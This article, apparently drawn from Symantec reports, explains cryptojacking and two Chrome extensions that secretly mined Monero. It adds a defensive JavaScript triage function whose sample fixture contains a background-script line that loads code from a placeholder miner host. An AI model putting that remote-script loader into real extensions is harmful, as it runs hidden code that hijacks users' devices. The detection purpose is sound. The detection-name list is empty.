Article based on and excerpted from Symantec reports.
One of the biggest cyber security trends of 2018 is cryptojacking, where cyber criminals surreptitiously run coinminers on victims’ devices without their knowledge and use their Central Processing Unit (CPU) power to mine cryptocurrencies.
This has been such a big trend this year that Symantec has published a research paper on this topic, featuring insights and analysis about this cyber security threat.
Cryptojacking surged in the last quarter of 2017, and its growth in popularity coincided with a surge in the value of cryptocurrencies, including Monero, the cryptocurrency mainly mined by CPU miners.
Cryptojacking in the cloud could also cause additional costs for businesses that are billed based on CPU usage.
What is cryptojacking?
Computer programs called coinminers are used to mine cryptocurrencies. Cryptocurrencies are digital currencies created using computer programs and computing power. Bitcoin is the best-known cryptocurrency, but it cannot be mined using personal computers—it requires specialist equipment to mine.
The cryptocurrency we primarily see mined on personal computers is Monero.
- File-based coin mining involves downloading and running an executable file on your computer.
- Browser-based coin mining takes place inside a web browser and is implemented using scripting languages.
Coin mining is not illegal, and many people choose to run files or scripts on their computers to carry out coin mining to make money themselves. Some websites may also use coin mining as an alternative to advertising to generate revenue, which is fine provided customers are told that their CPU power will be used to mine cryptocurrency while they are visiting that website.
The problems arise when people aren’t aware their computers are being used to mine cryptocurrency, or if cyber criminals surreptitiously install coinminers on victims’ computers or Internet of Things (IoT) devices without their knowledge—this is cryptojacking.
On May 8, we discovered two extensions for Google’s Chrome web browser that secretly perform coin mining after they are installed. Both extensions were found on the official Google Chrome Web Store.
One of the extensions, called 2048, is a version of a popular math-based strategy game. The extension was published in August 2017 and has over 2,100 users, which suggests the publisher has made some profit using the CPU cycles of those users to mine for cryptocurrency.
[Figure: Strategy game 2048 secretly mines for cryptocurrency]
[Figure: The 2048 extension has over 2,100 users]
The other extension, Mp3 Songs Download, claims to be an MP3 downloader but just redirects the user to an MP3 download website when they click on the extension button. The MP3 download website secretly launches a coin-mining script in the background. The Mp3 Songs Download extension was published in June 2017 and has around 4,000 users.
[Figure: The Mp3 Songs Download Chrome extension has almost 4,000 users]
Coin-mining script: 2048
The source code for the 2048 extension contains a hardcoded domain that is triggered when Chrome is launched.
Coin-mining script: Mp3 Songs Download
The extension Mp3 Songs Download doesn’t start its coin-mining script until the user clicks on the extension button and is redirected to a website.
[Figure: Website looks and functions like a normal MP3 download site]
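A defender can triage an unpacked extension for the two behaviors described above: a hardcoded remote host in code that starts with Chrome, and a button click that opens a hardcoded site. The following is an added example, not code from the Symantec report or from either extension; the function names, rule names, sample sources and the *.example hosts are assumptions made for illustration.

```javascript
// Added example: static triage of an unpacked Chrome extension (manifest + sources).
// Heuristics and sample data are constructed; the *.example hosts are placeholders.
const URL_RE = /\b(?:https?|wss?):\/\/([a-z0-9.-]+)/gi;

function hostsIn(text) {
  return [...new Set([...text.matchAll(URL_RE)].map((m) => m[1].toLowerCase()))];
}

// Scripts named under "background" run in a context that starts with Chrome.
function backgroundScripts(manifest) {
  const bg = manifest.background || {};
  return new Set([...(bg.scripts || []), ...(bg.service_worker ? [bg.service_worker] : [])]);
}

// files maps "relative/path.js" to source text. Returns findings for manual review.
function auditExtension(manifest, files) {
  const findings = [];
  // Manifest V2: a script-src entry naming a remote origin lets extension pages load code from it.
  const csp = typeof manifest.content_security_policy === "string" ? manifest.content_security_policy : "";
  const scriptSrc = csp.split(";").find((d) => d.trim().startsWith("script-src")) || "";
  for (const host of hostsIn(scriptSrc)) {
    findings.push({ rule: "csp-remote-script", path: "manifest.json", host });
  }
  const bg = backgroundScripts(manifest);
  for (const [path, src] of Object.entries(files)) {
    if (!bg.has(path)) continue; // only code that runs without the user opening a page
    // Toolbar-button handler that opens a tab: the click-then-redirect pattern.
    const redirects = /(?:browserAction|action)\.onClicked/.test(src) && /tabs\.(?:create|update)/.test(src);
    for (const host of hostsIn(src)) {
      findings.push({ rule: redirects ? "click-redirect" : "background-remote-host", path, host });
    }
  }
  return findings;
}

// Constructed sample 1: background script references a hardcoded host at browser start.
const gameExt = {
  manifest: { manifest_version: 2, background: { scripts: ["bg.js"] },
    content_security_policy: "script-src 'self' https://miner.example; object-src 'self'" },
  files: {
    "bg.js": "var s = document.createElement('script'); s.src = 'https://miner.example/m.js'; document.head.appendChild(s);",
    "game.js": "// rules: https://docs.example/2048\nfunction move(d) { return d; }",
  },
};
// Constructed sample 2: clicking the extension button opens a hardcoded external site.
const mp3Ext = {
  manifest: { manifest_version: 2, background: { scripts: ["bg.js"] }, browser_action: {} },
  files: { "bg.js": "chrome.browserAction.onClicked.addListener(function () { chrome.tabs.create({ url: 'http://mp3-site.example/' }); });" },
};
console.log(auditExtension(gameExt.manifest, gameExt.files), auditExtension(mp3Ext.manifest, mp3Ext.files));
```

Findings are leads for manual review rather than verdicts, since legitimate extensions also contact remote hosts from background code.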
Impact on users
The coin mining will persist for as long as the browser (with the 2048 extension installed) or website (in the case of the Mp3 Songs Download extension) remains open. The effects of this activity could include device slowdown, overheating batteries, increased energy consumption, and even devices becoming unusable.
[Figure: CPU usage spikes due to Mp3 Songs Download extension]
Furthermore, the malicious activity of these extensions is made harder to detect by the fact that they function as described. For example, the game 2048 is playable just like any 2048 game and the MP3 website contains downloadable MP3 files. This means that many users will not be suspicious and may not realize their computing power is being hijacked to make money for the developers behind these extensions.
We notified Google about these coin-mining extensions and they have now been removed from the Google Chrome Web Store.
Symantec and Norton products detect the extensions as the following:
- Pay close attention to CPU and memory usage on your computer or device. Abnormally high usage could be an indication of coin-mining.
- Check the app developer’s name, which can be found on the app’s store page. Do an internet search for the developer as there may be users who have had experience of their apps—good or bad.
- Check the app reviews. While fake reviews are common, they’re often short and generic. There may also be legitimate reviews from users who have figured out that the app isn’t what it appears to be.